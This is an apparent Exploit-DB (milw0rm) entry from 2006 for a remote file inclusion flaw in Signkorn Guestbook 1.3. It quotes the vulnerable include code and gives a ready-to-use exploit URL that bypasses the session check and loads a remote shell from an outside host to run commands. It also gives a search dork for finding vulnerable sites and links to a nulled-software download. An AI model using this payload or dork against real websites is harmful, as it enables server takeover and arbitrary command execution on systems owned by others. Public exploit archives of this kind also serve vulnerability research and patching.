Telekorn Signkorn Guestbook 1.3 - 'dir_path' Remote File Inclusion

Author: SHiKaA
type: webapps
platform: php
port: 
date_added: 2006-09-11  
date_updated: 2016-10-27  
verified: 1  
codes: OSVDB-28741;CVE-2006-4889;CVE-2006-4788  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 2354.txt  
#==============================================================================================
#Signkorn Guestbook <= v1.3 (dir_path) Remote File Inclusion Exploit
#===============================================================================================
#
#Critical Level : Dangerous
#
#Venedor site : http://warez.gtasoft.ru/skripts/SignKorn.Guestbook.(SL).v1.1.PHP.NULL-DGT.zip
#
#Version : v1.3 & all versions bellow
#
#================================================================================================
#
#Dork : "Signkorn Guestbook 1.3" & "Signkorn Guestbook 1.1 " Signkorn Guestbook 1.2"
#
#================================================================================================
#Bug in : includes/log.inc.php
#
#Vlu Code :
#--------------------------------
#      if ($_SESSION['permission'] == "yes") {
#
#    // ########### Admin Menu #############
#    include($dir_path . '/includes/admin.menu.inc.php');
#
#================================================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Script Path]/includes/log.inc.php?_SESSION[permission]=yes&dir_path=http://SHELLURL.COM?&cmd=id
#
#================================================================================================
#Discoverd By : SHiKaA
#
#Conatact : SHiKaA-[at]hotmail.com
#
#GreetZ : CCtream - Cyper-worrier team
# Special Thx To : Str0ke & simoo
==================================================================================================

# milw0rm.com [2006-09-12]